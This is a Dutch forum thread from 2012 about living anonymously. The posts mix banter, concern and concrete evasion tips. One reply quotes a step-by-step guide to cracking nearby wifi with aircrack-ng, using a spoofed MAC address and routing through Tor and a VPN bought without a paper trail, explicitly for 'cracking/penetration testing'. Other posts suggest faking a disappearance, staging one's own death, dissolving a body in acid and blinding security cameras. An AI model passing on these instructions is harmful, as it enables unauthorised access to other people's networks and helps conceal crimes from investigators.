Of blijven hangen in ''verstoppertje spelen''quote:Op donderdag 24 mei 2012 01:21 schreef thenxero het volgende:
Ben je een infiltrant die niet ontdekt mag worden ofzo
Geen (of indien het niet anders kan zo weinig mogelijk) prive informatie op internet gooien.quote:Maar ik vroeg me af wat jullie nou allemaal doen om je privacy te bewaken?
Dit dus.quote:Op donderdag 24 mei 2012 01:36 schreef vosss het volgende:
[..]
Geen (of indien het niet anders kan zo weinig mogelijk) prive informatie op internet gooien.
Ik denk dat we inderdaad de eer hebben om met een speciale afgevaardigde van Utopia te maken te hebben!quote:Op donderdag 24 mei 2012 01:21 schreef thenxero het volgende:
Ben je een infiltrant die niet ontdekt mag worden ofzo
Ervaringsdeskundige ofzo?quote:Op donderdag 24 mei 2012 02:07 schreef TonyTonyChoppa het volgende:
Zorgen dat je gaat verhuizen naar nieuwe plek dit allemaal goed voortberijden zonder dat ook iemand maar wat door heeft. Op het momment dat je over 1 2 weken kunt verhuizen melden dat je over 1 - 2 weken op vakantie gaat.
Op al jou oude social media accounts delen dat je op vakantie gaat over 1 - 2 weken.
Verhuizen en naam wijzigen en dan delen op facebook dat je op vakantie bent deel 1 van oude vakantie foto's die je nooit gedeelt hebt doe dit 3 4 weken lang 1x per dag alleen contact houden met familie en vrienden via social media die 3 4 weken lang.
Na 3 4 weken ga je virtueel spoorloos deel je nooit meer wat via social media en blijf je anoniem.
Niemand ooit vertellen wie je werkelijk bent en vooral geen contact meer zoeken met familie en vrienden anders val je altijd wel weer te traceren en ben je zo niet meer anoniem.
Vooral geen rare dingen doen in je nieuwe omgeving en online nooit je echte naam gebruiken.
En gaat het dan toch fout dan flik je zelfde kunstje zo nog eens en verdwijn je weer spoorloos waarschijnlijk leer je zelfs nog van de fouten die je gemaakt hebt.
Enneuhm.. hoe upload je die anoniem? Je logt dan toch in op je oude account op je nieuwe adres..quote:Op donderdag 24 mei 2012 02:07 schreef TonyTonyChoppa het volgende:
Op al jou oude social media accounts delen dat je op vakantie gaat over 1 - 2 weken.
Verhuizen en naam wijzigen en dan delen op facebook dat je op vakantie bent deel 1 van oude vakantie foto's die je nooit gedeelt hebt
Nee hier had uitgebreid filmpje over gezien op youtube weet niet meer hoe het hete.quote:
VPNquote:Op donderdag 24 mei 2012 02:13 schreef spijkerbroek het volgende:
[..]
Enneuhm.. hoe upload je die anoniem? Je logt dan toch in op je oude account op je nieuwe adres..
Je mobiel kado geven aan iemand op locatie van waar je zogenaamd op vakantie gaat bv iemand waar mee je afspraken gemaakt hebt in die paar weken voorbereiding.quote:Op donderdag 24 mei 2012 02:14 schreef smitjew het volgende:
Geen pc of mobiel hebben helpt en geen vrienden ook maar dat zal wel niet het probleem zijn
Is ook te traceren.quote:
Kan heel makkelijk je moet gewoon je normale leven virtuele leven en criminele leven etc gescheiden houden.quote:Op donderdag 24 mei 2012 02:16 schreef smitjew het volgende:
Wat maakt je privacy uit als je zo leeft wat hou je dan prive, dat je geen leven hebt ?
2 dubbele vpn die op andermans naam staat en via een VM draaidt valt volgens mij niet te traceren er zijn hier iedergeval wel mogelijkheden voor.quote:
Waarom doe je al die moeite van vakantiefoto's als je ook gewoon niks meer van je kan laten horen.quote:Op donderdag 24 mei 2012 02:19 schreef TonyTonyChoppa het volgende:
2 dubbele vpn die op andermans naam staat en via een VM draaidt valt volgens mij niet te traceren er zijn hier iedergeval wel mogelijkheden voor.
heb geen crimineel leven en hier ken ik niemand en ik roep niemand op me af dus maakt me vrij weinig uitquote:Op donderdag 24 mei 2012 02:18 schreef TonyTonyChoppa het volgende:
[..]
Kan heel makkelijk je moet gewoon je normale leven virtuele leven en criminele leven etc gescheiden houden.
Zo dat mensen niet per direkt op onderzoek uit gaat je pas paar maanden later als vermist opgeeft.quote:Op donderdag 24 mei 2012 02:22 schreef spijkerbroek het volgende:
[..]
Waarom doe je al die moeite van vakantiefoto's als je ook gewoon niks meer van je kan laten horen.
Goh ben je zo braaf dan ? Waarom dan anoniemquote:Op donderdag 24 mei 2012 02:23 schreef smitjew het volgende:
[..]
heb geen crimineel leven en hier ken ik niemand en ik roep niemand op me af dus maakt me vrij weinig uit
Als je het goed voorbereidt en je voert het plan goed uit, dan boeit dat toch niet.quote:Op donderdag 24 mei 2012 02:24 schreef TonyTonyChoppa het volgende:
Zo dat mensen niet per direkt op onderzoek uit gaat je pas paar maanden later als vermist opgeeft.
Dit heeft ook weer zijn voordelen.
Ik stem voor Belgie.quote:Op donderdag 24 mei 2012 02:24 schreef Piet_Piraat het volgende:
Emigreren naar een vaag land en dan illigaal terugkomen.
Als je naar een week anonimiteit kwijtraakt heeft ook weinig nut 1x per jaar gaat nog wel want 1x per jaar verhuizen is nog wel te doenquote:Op donderdag 24 mei 2012 02:25 schreef spijkerbroek het volgende:
[..]
Als je het goed voorbereidt en je voert het plan goed uit, dan boeit dat toch niet.
ben niet braaf heb wel wat dingen gedaan maar blijf aardig en moest een username hebben hier gebruik ik overal en sommige weten al hoe ik heet en eruit zie omdat ze mijn ouwe hyves hadden gevondenquote:Op donderdag 24 mei 2012 02:24 schreef TonyTonyChoppa het volgende:
[..]
Zo dat mensen niet per direkt op onderzoek uit gaat je pas paar maanden later als vermist opgeeft.
Dit heeft ook weer zijn voordelen.
[..]
Goh ben je zo braaf dan ? Waarom dan anoniem?
Nee want dat maakt het nogal obvious.quote:
Dan heb je het dus niet goed voorbereid en/of uitgevoerd en is het je eigen schuld.quote:Op donderdag 24 mei 2012 02:26 schreef TonyTonyChoppa het volgende:
Als je naar een week anonimiteit kwijtraakt heeft ook weinig nut 1x per jaar gaat nog wel want 1x per jaar verhuizen is nog wel te doen
autistenboekquote:Op donderdag 24 mei 2012 02:31 schreef Coen4d het volgende:
Eden Press, 100 Ways to Disappear and Live Free.
Is misschien een boek voor je, als je hem nog niet hebt.
Dan moet je deze informatie natuurlijk niet op internet zetten heh?quote:geen bonus ah dingetjes op me sleutel bos alleen van een vriendin van me.[..]Ik heb in mijn buurt 3 ah supermarkten allemaal met dezelfde loop afstand. Ik probeer zovaak mogelijk een andere te nemen.
Mjah zo iets heeft zo bie zo extreem veel voorbereiding nodig maar als mensen er achterkomt dat je ergens mee bezig bent is ook niet goed dus veel onderzoek doen wat je kunt doen helpt dan ook wel.quote:Op donderdag 24 mei 2012 02:31 schreef spijkerbroek het volgende:
[..]
Dan heb je het dus niet goed voorbereid en/of uitgevoerd en is het je eigen schuld.
Tevens: doe eens wat aan je spelling, man. Godverdomme, wat een kanker komt er uit je vingers.
Ik voel me beledigtquote:
Dan moet je wel guinee pig hebben en het zo doen dat lichaam onherkenbaar is.quote:Op donderdag 24 mei 2012 02:34 schreef Piet_Piraat het volgende:
De meest effectieve manier is je eigen dood in scene zette.
nee , paar jaar later heb je dan een hologramquote:Op donderdag 24 mei 2012 02:34 schreef Piet_Piraat het volgende:
Te hoog risico.quote:Op donderdag 24 mei 2012 02:34 schreef Piet_Piraat het volgende:
Een lichaam wordt niet altijd teruggevonden.quote:Op donderdag 24 mei 2012 02:38 schreef TonyTonyChoppa het volgende:
[..]
Dan moet je wel guinee pig hebben en het zo doen dat lichaam onherkenbaar is.
Mjah dat is niet grootste probleem want DNA test zou uitwijzen dat de persoon die dood is niet jou is.
Dan is er ook altijd nog twijfel.quote:Op donderdag 24 mei 2012 02:40 schreef Piet_Piraat het volgende:
[..]
Een lichaam wordt niet altijd teruggevonden.
Dit is geen topic over hoe zelfmoord te plegenquote:Op donderdag 24 mei 2012 02:42 schreef smitjew het volgende:
Lichaam in zuur doen en resten met amoniak
nee dood in scene zetten ofzo.quote:Op donderdag 24 mei 2012 02:42 schreef TonyTonyChoppa het volgende:
[..]
Dit is geen topic over hoe zelfmoord te plegen
Dat snap ik, TS is kennelijk toch al in zoverre een schim dat niemand hem zou missen zou hij er echt niet meer zijnquote:Op donderdag 24 mei 2012 02:42 schreef TonyTonyChoppa het volgende:
[..]
Dit is geen topic over hoe zelfmoord te plegen
Petje op of hoedje met een infrarood ledje aan de voorkant, werkt in de avond.quote:Op donderdag 24 mei 2012 02:41 schreef Catkiller het volgende:
Loop je wel met je rug langs beveiligingscamera's anders weten ze wanneer je boodschappen doet bij welke AH.
Mijn vraag is, waarom zo doorgeslagen?!
Ga je iemand anders vermoorden dan?quote:Op donderdag 24 mei 2012 02:44 schreef smitjew het volgende:
[..]
nee dood in scene zetten ofzo.
en hoe moet ik zoiets als zelfmoord beschouwen zuur over jezelf gieten dan ben je autist
Alu hoedjes werken ook.quote:Op donderdag 24 mei 2012 02:45 schreef Coen4d het volgende:
[..]
Petje op of hoedje met een infrarood ledje aan de voorkant, werkt in de avond.
Het idee is dat je nightshot camera's verblind met licht dat mensen niet kunnen zien.quote:
Bij de aivd hebben ze me ooit afgeluisterd.quote:Op donderdag 24 mei 2012 02:49 schreef Coen4d het volgende:
Wait a minute.
Ben jij iemand van de aivd die zijn huiswerk niet heeft gedaan?
Of ben je Fok in kaart aan het brengen?
En toen belden ze je op om te zeggen dat ze je hadden afgeluisterd?quote:Op donderdag 24 mei 2012 02:53 schreef Piet_Piraat het volgende:
[..]
Bij de aivd hebben ze me ooit afgeluisterd.
Gewoon in IEDER telefoongesprek dat je voert gewoon vanuit het niets termen als Osama, Al Qaida, Aanslag, Koningin, Wilders, Roemer, DOOD DOOD DOOD, etc etc laten vallen...quote:Op donderdag 24 mei 2012 02:53 schreef Piet_Piraat het volgende:
[..]
Bij de aivd hebben ze me ooit afgeluisterd.
Ik trek je methode ook niet in twijfel, gaf slechts een aanvulling.quote:Op donderdag 24 mei 2012 02:52 schreef Coen4d het volgende:
[..]
Het idee is dat je nightshot camera's verblind met licht dat mensen niet kunnen zien.
Het is een bewezen concept.
Nee dat werd wel duidelijk toen degene waarmee ik vaak belde en veel contact had,een tijd later bezoek kreeg.quote:Op donderdag 24 mei 2012 02:53 schreef Coen4d het volgende:
[..]
En toen belden ze je op om te zeggen dat ze je hadden afgeluisterd?
En toen, nu ben ik nieuwsgierig...quote:Op donderdag 24 mei 2012 02:57 schreef Piet_Piraat het volgende:
[..]
Nee dat werd wel duidelijk toen degene waarmee ik vaak belde en veel contact had,een tijd later bezoek kreeg.
Dat dus en wanneer je zorgt dat de omstandigheden overduidelijk zijn dan is dat redelijk snel geregeld wanneer je al weinig contact had met familie.quote:Op donderdag 24 mei 2012 02:55 schreef TonyTonyChoppa het volgende:
Dat je als vermist wordt opgegeven heeft geen enkel risico want na tijdje verklaren ze je toch dood.
Familie is onberekenbaar. Te veel potentiële losse eindjes en als het om wat voor een reden mislukt ben je de sigaar en zal herhaling ongeloofwaardig zijn in wat voor een vorm dan ook.quote:Op donderdag 24 mei 2012 02:55 schreef TonyTonyChoppa het volgende:
Vergeet niet dat als je iemand vermoordt ook al is het succesvol als je anon status kwijt raakt ga je de bak in lijkt me dus niet echt goeie optie.
Dat je als vermist wordt opgegeven heeft geen enkel risico want na tijdje verklaren ze je toch dood.
Misschien dat jouw post nu net ook voor een rode vlag heeft gezorgd.quote:Op donderdag 24 mei 2012 02:55 schreef Yi-Long het volgende:
[..]
Gewoon in IEDER telefoongesprek dat je voert gewoon vanuit het niets termen als Osama, Al Qaida, Aanslag, Koningin, Wilders, Roemer, DOOD DOOD DOOD, etc etc laten vallen...
...net zolang tot ze doorhebben dat het helemaal nergens meer over gaat en je het gewoon doet om ze te fucken...
... en DAN een aanslag plegen!
Het was eik best grappig verhaal.quote:
Dit is geen bs?quote:Op donderdag 24 mei 2012 03:10 schreef Piet_Piraat het volgende:
[..]
Het was eik best grappig verhaal.
Ik had veel contact met een Surinaamse bosneger die dingen voor Junglecommando van Ronny B regelde met zijn goede internationale contacten.
Samen waren we in Libanon geweest.
Mijn broer was anti kruisraket activist en was al paar keer opgepakt.
Toen kwamen ze ineens bij mijn Surinaamse maat aan de deur voor gesprek om te infiltreren.
Geen bs, mijn Surinaamse maat is al jaren geleden dood gevonden in het oerwoud.quote:Op donderdag 24 mei 2012 03:12 schreef Coen4d het volgende:
[..]
Dit is geen bs?
Wel grappig dan en best wel
Wow, dood ja, ben je wel erg casual onder.quote:Op donderdag 24 mei 2012 03:23 schreef Piet_Piraat het volgende:
[..]
Geen bs, mijn Surinaamse maat is al jaren geleden dood gevonden in het oerwoud.
Ik al tijden uit beeld.
Mijn broer inmiddels braaf en het kan nu weinig kwaad meer om het te posten.
Dan ben je dubbel te volgen.quote:
Is al lang geleden en doe er luchtiger over dan ik ben.quote:Op donderdag 24 mei 2012 03:36 schreef Coen4d het volgende:
[..]
Wow, dood ja, ben je wel erg casual onder.
Dat moet je TS vragen, ik geef slechts wat mogelijkheden.quote:Op donderdag 24 mei 2012 04:11 schreef Typisch het volgende:
[..]
Ja en wat bereik je er mee en vooral wat heb je er aan? Wat voor verschil maakt het?
Ik kan niks bedenken. Behalve schulden die je wilt ontlopen, maar dan zul je vast niet zomaar je naam kunnen veranderen.quote:Op donderdag 24 mei 2012 04:12 schreef Piet_Piraat het volgende:
[..]
Dat moet je TS vragen, ik geef slechts wat mogelijkheden.
...niet als ik elke dag zo'n post maakquote:Op donderdag 24 mei 2012 03:06 schreef Coen4d het volgende:
[..]
Misschien dat jouw post nu net ook voor een rode vlag heeft gezorgd.![]()
Beetje fantasie kopen?quote:Op donderdag 24 mei 2012 04:13 schreef Typisch het volgende:
[..]
Ik kan niks bedenken. Behalve schulden die je wilt ontlopen, maar dan zul je vast niet zomaar je naam kunnen veranderen.
Welke ziekten je hebt, wat je denkt, welke politieke voorkeur je hebt etc.quote:Op donderdag 24 mei 2012 19:21 schreef MrBaas het volgende:
Auwhoer, wat maakt het mij uit of er iemand in Den Haag weet:
-Dat ik boodschappen doe bij de AH
-Wat voor boodschappen ik doe
-Hoe ik eruit zie
-Waar ik naar toe ga (camerabeelden)
-Wat ik doe op internet
-Wat ik voor werk doe
-Hoeveel ik verdien
-Wat mijn hobby's zijn
-Waar ik mijn geld aan uitgeef
Wat moet mij dit uitmaken? Wat voor dingen mogen die gasten niet weten dan?
Wat maakt het mij uit of zij weten dat ik maar 1 bal heb en onlangs bij de arts ben geweest voor aambeien?quote:Op donderdag 24 mei 2012 19:31 schreef Gray het volgende:
[..]
Welke ziekten je hebt, wat je denkt, welke politieke voorkeur je hebt etc.
Ik snap het wel, dat anoniem willen blijven, maar ik denk niet dat het mogelijk is. Of je moet illegaal verblijven in een onbewoonde omgeving, maar ja, niet iedereen wil dat.
Het hoeft niet.quote:Op donderdag 24 mei 2012 19:45 schreef MrBaas het volgende:
[..]
Wat maakt het mij uit of zij weten dat ik maar 1 bal heb en onlangs bij de arts ben geweest voor aambeien?
En hetzelfde geldt voor politieke voorkeur. Naar mijn weten is stemmen anoniem. Het zou me overigens niets uitmaken als iedereen weet wat ik stem. Waarom zou je daar een probleem van maken?
Te laat, je ip is bekend, ook al is die van de buren. (Thanks for the info!)quote:Op donderdag 24 mei 2012 01:13 schreef zyntex het volgende:
Ik wil graag weten hoe ik mijn anonimiteit in deze maatschappij nog beter zou kunnen verbeteren.
Zo weinig mogelijk je eigen naam gebruiken. Voor de rest bestaat privacy niet. Je bent eerder anoniem door over al bij te horen dan nergens bij te horen. Wat denk je dat eerder opvalt?quote:Maar ik vroeg me af wat jullie nou allemaal doen om je privacy te bewaken?
Maatregelen nemen om zo anoniem mogelijk te zijn, maar aangezien je dit al niet snapte betwijfel ik of je ooit zult begrijpen waar dit topic over gaat.quote:
Uh.. Gozerquote:Op donderdag 24 mei 2012 19:54 schreef Coen4d het volgende:
[..]
Maatregelen nemen om zo anoniem mogelijk te zijn, maar aangezien je dit al niet snapte betwijfel ik of je ooit zult begrijpen waar dit topic over gaat.
quote:Required files:VMWare Workstation:
http://www.demonoid.me/files/details/2787488/008172892720/Windows 7 Ultimate: http://www.demonoid.me/fi(...)3064834770/BackTrack 5 R1 VMWare: http://www.backtrack-linu(...)OME-VM-32.7zpfsense: http://files.chi.pfsense.(...)E-amd64.iso.gzUbuntu Live CD: http://www.ubuntu.com/sta(...)ts=32&release=latest
Required Hardware:
Virtualization supported CPU
4GB RAM
USB wifi adapter supporting packet injection:http://www.amazon.com/Alf(...)id=1328768355&sr=8-2
VPN Account without paper trail
Purchase prepaid visa card with cash
Purchase Bitcoins with Money Order
Donate Bitcoins to different account
Purchase VPN account with bitcoins
VPN ServicesoVPN.to
www.CCHeaven.in
https://www.vpntunnel.se/
https://www.ipredator.se/?lang=en
http://strongvpn.com/
Step One
Enable Boot and Setup page BIOS password
Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab
Step Two
Boot Ubuntu LiveCD to cleanly wipe hard drive
After booting LiveCD, open up terminal and type sudo "fdisk -l" to get a list of disks and partitions
Use the wipe command on each partition that is listed with the above commandie "sudo wipe /dev/sda1"
Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
Reboot
Step Three
Install Windows 7 Ultimate and shred free space
Boot from Windows disk and install
After clean install, install fileshredder http://www.fileshredder.org
Run fileshredder using "Secure Erasing Algorithm with 7 passes"Reboot
Enable BitLocker drive encryption. Safe key to USB stick
Reboot
Run Windows Update
Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
Reboot
Step Four
Install VMWare
Step Five
BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
Set VM to 256MB RAM
Create a Network Adapter (VMNet0)
Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
Bridge eth0 to wlan0
Easy Mode method:
apt-get -y install network-manager
rm /etc/network/interfaces
reboot
Open Network Manager
eth0 IPv4 Settings > Method > Shared to other computers
Use aircrack-ng to crack surrounding AP's
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
Get SSID and channel for next step
airodump-ng -c (channel #) -w (file name) --bssid (bssid) wlan0
Let this sit until you have plenty of data points
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
Look for successful ACK
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
Also let this run for a while, look for 10k ACK's aircrack-ng -b (bssid) (file name-01.cap)
Connect to SSID
Step Six
Pfsense install to use VPN
8 GB of Hard Drive space
256MB RAM
Two Network Adapters (VMnet0 and VMnet1)
After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
Assign LAN IP and enable DHCP (192.168.1.1/24)
Step Seven
Install TorBox to anonymize ALL traffic
128MB RAM
5GB Hard Drive space
One Network Adapter (VMnet1)
Follow Torproject.org instructions for TorBox https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
Open a browser and go to http://192.168.1.1
Login to pfsense with admin/pfsense and change password, force https, and enable all logging
Go to PPTP VPN Tab and input info from VPN info above
Step Eight
BackTrack 5 R1 VM for all cracking/penetration testing/everything
Import another BT5 vmware image
512MB RAM
One Network Adapter (VMnet1)
Set default Gateway to match the IP of your previous VM (TorBox)
ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
Download Tor Bundle from torproject.org
Use FireFox Portable bunlded with Tor Bundle (more secure)
All exploiting/penetration testing, cracking, etc is done on this VM
Step Nine
Encrypt All VM's
Open settings for Each VM in VMWare
Under Options > Enable Encryption
Set secure password
Nee t was duidelijk genoeg, misschien een beetje hard om je dom te noemen, maar je helpt jezelf niet echt gezien je bijdrage aan dit topic.quote:Op donderdag 24 mei 2012 19:56 schreef MrBaas het volgende:
[..]
Uh.. Gozer
Het kon ook heel goed zijn dat je bedoelde dat al deze informatie niet allemaal verzameld hoeft te worden.
Dat jij hier zo slecht communiceert hoeft niet te betekenen dat ik dom ben.
Ik kom hier ook niet om mezelf te helpen maar om mee te doen aan de discussie hier.quote:Op donderdag 24 mei 2012 19:59 schreef Coen4d het volgende:
[..]
Nee t was duidelijk genoeg, misschien een beetje hard om je dom te noemen, maar je helpt jezelf niet echt gezien je bijdrage aan dit topic.
doe normaal man, tegenwoordig hoef je niets te verbergen te hebben om anoniem te willen zijn. Krijg je ervan als de regering DPI gaat toepassen en logfiles van vijf jaar eist.quote:Op donderdag 24 mei 2012 20:08 schreef Coen4d het volgende:
@ TS
Misschien is het fijn om wat minder krampachtig te zijn, tenzij je echt iets te verbergen hebt.
Als het een fictieve post is prima.
Het komt over alsof je eenzaam en aan het radicaliseren bent, met dit als schreeuw om aandacht.
Als dit zo is, is hulp zoeken aan te raden in wat voor een vorm dan ook.
Ik kan er helemaal naast zitten, ik hoop dat dat zo is.
Je zegt alleen maar dat je niets te verbergen hebt en vraagt aan mensen waarom je anoniem zou willen zijn, ik zeg dat het niet hoeft, jij snapt dat niet en dat vond ik dom.quote:Op donderdag 24 mei 2012 20:03 schreef MrBaas het volgende:
[..]
Ik kom hier ook niet om mezelf te helpen maar om mee te doen aan de discussie hier.
Kan je niet gewoon normaal reageren -_- ?
Ben jij TS?quote:Op donderdag 24 mei 2012 20:13 schreef b4kl4p het volgende:
[..]
doe normaal man, tegenwoordig hoef je niets te verbergen te hebben om anoniem te willen zijn. Krijg je ervan als de regering DPI gaat toepassen en logfiles van vijf jaar eist.
Nee makker, anonimiteit is bijna een must tegenwoordig. Stel je voor dat je per ongeluk vier jaar geleden een onthoofdingsfilmpje hebt gekeken en jouw buurman zijn vrouw heeft onthoofd.
gelukkig niet, beetje paranoide komt hij wel over maar wilde even een puntje maken.quote:Op donderdag 24 mei 2012 20:22 schreef Coen4d het volgende:
[..]
Ben jij TS?
Ik begrijp volkomen waarom je anonimiteit zou willen, ik ben alleen een beetje bezorgt over zyntex.
Ik hoop/ neem aan dat ik ernaast zit.
De man die de mensheid heeft laten zien dat goddelijkheid in u zelve zit.quote:Op vrijdag 25 mei 2012 01:48 schreef Bankfurt het volgende:
Bekeer u tot Jezus,
... en duivelse krachten zullen niets meer van u willen weten.
nee geef typs die ik films en series heb gezienquote:Op donderdag 24 mei 2012 02:47 schreef Piet_Piraat het volgende:
[..]
Ga je iemand anders vermoorden dan?
Maar wel meteen een mal heeft?quote:Op donderdag 24 mei 2012 01:47 schreef Spees_Eend het volgende:
Ik draag altijd kaarsvet op mijn vingertoppen zodat de CIA niet vanuit hun helicopter mijn vingerafdrukken kan lezen.
Zal ik aan denken als ik iemand die ik niet ken weer iemand digitale voetstappen volgquote:Op donderdag 24 mei 2012 20:12 schreef UltraBrain het volgende:
"De maatschappij, dat ben jij".
En ik kijk heel wijs terwijl ik dit zeg.
Mooi gezegd man.quote:Op vrijdag 25 mei 2012 01:49 schreef Typisch het volgende:
[..]
De man die de mensheid heeft laten zien dat goddelijkheid in u zelve zit.
Edit:quote:Op vrijdag 25 mei 2012 01:49 schreef Typisch het volgende:
[..]
De man die de mensheid heeft laten zien dat goddelijkheid in u zelve zit.
Ik keerde hem de rug toe en kreeg een schouderklopje van de duivel.quote:Op vrijdag 25 mei 2012 01:48 schreef Bankfurt het volgende:
Bekeer u tot Jezus,
... en duivelse krachten zullen niets meer van u willen weten.
Ja daar zat ik dus ook over te denken maar ipv dan juist zogenaamd mee doen met de massa door onbelangrijke informatie te posten gewoon constant een stroom van onjuiste info sturen.quote:Op donderdag 24 mei 2012 19:51 schreef Mr_Belvedere het volgende:
[..]
Te laat, je ip is bekend, ook al is die van de buren. (Thanks for the info!)
[..]
Zo weinig mogelijk je eigen naam gebruiken. Voor de rest bestaat privacy niet. Je bent eerder anoniem door over al bij te horen dan nergens bij te horen. Wat denk je dat eerder opvalt?
Is geen facebook account maken niet handiger?quote:Op vrijdag 25 mei 2012 14:50 schreef zyntex het volgende:
Bijvoorbeeld random google afbeeldingen op facebook zetten en dan met bijschrift dit is me oom dit is me tante.
alleen dat?quote:Op donderdag 24 mei 2012 01:16 schreef igottagun het volgende:
Verder is dit een beetje krankzinnig:
Mensen in mijn omgeving kennen mijn voornamen niet. Ik stel me altijd aan iedereen voor als een eigen voornaam die best wel random is. Alleen me huisgenoten weten mogelijk mijn initialen als ze eerder dan ik de post hebben… is lastig want ik sta vaak vroeg op.
Niet rebels genoegquote:Op vrijdag 25 mei 2012 16:45 schreef Piet_Piraat het volgende:
[..]
Is geen facebook account maken niet handiger?
Sorry dat ik dit zeg..hoewel ik hier respect voor heb dat je op deze manier leeft ik vind het echt dikke bullshit. Zoals ik al eerder aangaf het heeft geen zin om te vechten tegen het systeem(dit denk ik).quote:Op donderdag 24 mei 2012 01:13 schreef zyntex het volgende:
Ik wil graag weten hoe ik mijn anonimiteit in deze maatschappij nog beter zou kunnen verbeteren.
Ik betaal alles contact behalve als het niet anders kan.
Ik heb een anonieme ov chipkaart en trein koop ik een kaartje.
Ik heb een mijn pasjes in een speciale doosje zodat ze niet kunnen worden uitgelezen van een afstand. (cardprotector)
Ik zit al jaren op de wifi van de buren dus dat geeft weer een extra drempel .
Ik heb naast mijn normale telefoon ook een prepaid voor het uploaden van filmpjes op youtube, registreren etc. Staat altijd uit alleen aan indien nodig.
Ik heb geen bonus ah dingetjes op me sleutel bos alleen van een vriendin van me. Ze hoeven wat mij betreft niet te weten wat ik eet. Ik heb in mijn buurt 3 ah supermarkten allemaal met dezelfde loop afstand. Ik probeer zovaak mogelijk een andere te nemen.
Ik sta alleen ingeschreven op me adres en bank voor de rest nergens. Ik doe nergens aan mee of whatever.
Mensen in mijn omgeving kennen mijn voornamen niet. Ik stel me altijd aan iedereen voor als een eigen voornaam die best wel random is. Alleen me huisgenoten weten mogelijk mijn initialen als ze eerder dan ik de post hebben… is lastig want ik sta vaak vroeg op.
Later meer…
Maar ik vroeg me af wat jullie nou allemaal doen om je privacy te bewaken?
Stop met internettenquote:Op donderdag 24 mei 2012 01:13 schreef zyntex het volgende:
Ik betaal alles contact behalve als het niet anders kan.
Ik heb een anonieme ov chipkaart en trein koop ik een kaartje.
Ik heb een mijn pasjes in een speciale doosje zodat ze niet kunnen worden uitgelezen van een afstand. (cardprotector)
Ik zit al jaren op de wifi van de buren dus dat geeft weer een extra drempel .
Ik heb naast mijn normale telefoon ook een prepaid voor het uploaden van filmpjes op youtube, registreren etc. Staat altijd uit alleen aan indien nodig.
Ik heb geen bonus ah dingetjes op me sleutel bos alleen van een vriendin van me. Ze hoeven wat mij betreft niet te weten wat ik eet. Ik heb in mijn buurt 3 ah supermarkten allemaal met dezelfde loop afstand. Ik probeer zovaak mogelijk een andere te nemen.
Ik sta alleen ingeschreven op me adres en bank voor de rest nergens. Ik doe nergens aan mee of whatever.
Later meer…
Maar ik vroeg me af wat jullie nou allemaal doen om je privacy te bewaken?
Juist, dit ben ik met je eens..ik hoop dat jij de "backdoor" al gevonden hebt..ik ga er even voor de makkelijkheid vanuit dat dat zo is. Dan weet je waarover ik het heb..quote:Op zaterdag 26 mei 2012 03:59 schreef thesystem het volgende:
Een uitvlucht uit het systeem is er altijd maar daarvoor dien je grenzen te verleggen...te verdwijnen en alles op te willen geven wat je nu bezit....
I wouldn't be so sure about that.quote:[ je bent echt niet zo belangrijk dat iemand jouw gegevens gaat opzoeken om jouw leven te kunnen onderzoeken![]()
Wie zou dat dan doen? Waarschijnlijk mensen uit je omgeving of bedrijven waar je solliciteert. Maar dat blijft hooguit bij googlen.quote:
Dat dus. Waarom zou het 'ze' boeien als je gewoon je leven leeft en gewoon je werk doet?quote:Op woensdag 30 mei 2012 02:36 schreef SchoneZoon het volgende:
Volledig anoniem leven kan niet in Nederland, dan moet je maar in een of andere jungle in Afrika of Zuid-Amerika gaan wonen![]()
En waarom leg je jezelf zoveel beperkingen op om anoniem te blijven? Dat je bepaalde zaken geheim wil houden kan ik begrijpen, maar als je zover gaat dat je zelfs andere routes gaat lopen, dan ben je echt niet 100%. En geloof mij maar, je bent echt niet zo belangrijk dat iemand jouw gegevens gaat opzoeken om jouw leven te kunnen onderzoeken![]()
Je bent gewoon een nietszeggend persoon tussen al die miljarden mensen. Denk je nou echt dat de overheid/geheime dienst jou zal volgen?![]()
En als je iets van plan bent en je wordt gepakt, dan kunnen ze heus niet al jouw gegevens opvragen om je leven te onderzoeken.
(Misschien in de toekomst, als ze de technologie ervoor hebben, maar dat is een ander verhaal).
met www.123people.com kom je doorgaans een heel eind.quote:Op vrijdag 25 mei 2012 16:52 schreef rhubarbje het volgende:
[..]
alleen dat?
ik vind het allemaal krankzinnig
en krijg heel veel zin om TS te gaan googlen en kijken hoe ver ik kom
helaas heb ik totaal geen digi skills
"Ze" hebben nieteens de tijd en geld om al die criminelen te volgen, laat staan dat ze een of andere nietszeggende burger gaan volgenquote:Op woensdag 30 mei 2012 14:10 schreef Lavenderr het volgende:
[..]
Dat dus. Waarom zou het 'ze' boeien als je gewoon je leven leeft en gewoon je werk doet?
En dat gebeurt vaak genoeg bij mensen die wel bij instanties bekend zijn. Die liggen soms maanden dood in huis, in enkele gevallen zelfs jaren.quote:Op woensdag 30 mei 2012 16:50 schreef SchoneZoon het volgende:
[..]
"Ze" hebben nieteens de tijd en geld om al die criminelen te volgen, laat staan dat ze een of andere nietszeggende burger gaan volgen![]()
Misschien heeft TS last van achtervolgingswaanzin....of grootheidswaanzin, dat hij denkt dat ie zo belangrijk is dat mensen alles over hem te weten willen komen![]()
Een gevaar van volledig anoniem leven is dat niemand jou zal (her)kennen. Stel je gaat opeens dood in je eigen huis. Pas maanden later kunnen mensen erachter komen en als je volledig anoniem bent, zal niemand jou kunnen identificeren.
Ik weet niet of TS zo wil eindigenAnonimiteit is goed tot op een bepaalde hoogte. Als je volledig anoniem wil zijn moet je er echt een goede reden voor hebben, zoals "vijanden" die jou willen pakken of als je je bezig wilt houden met "verkeerde dingen"
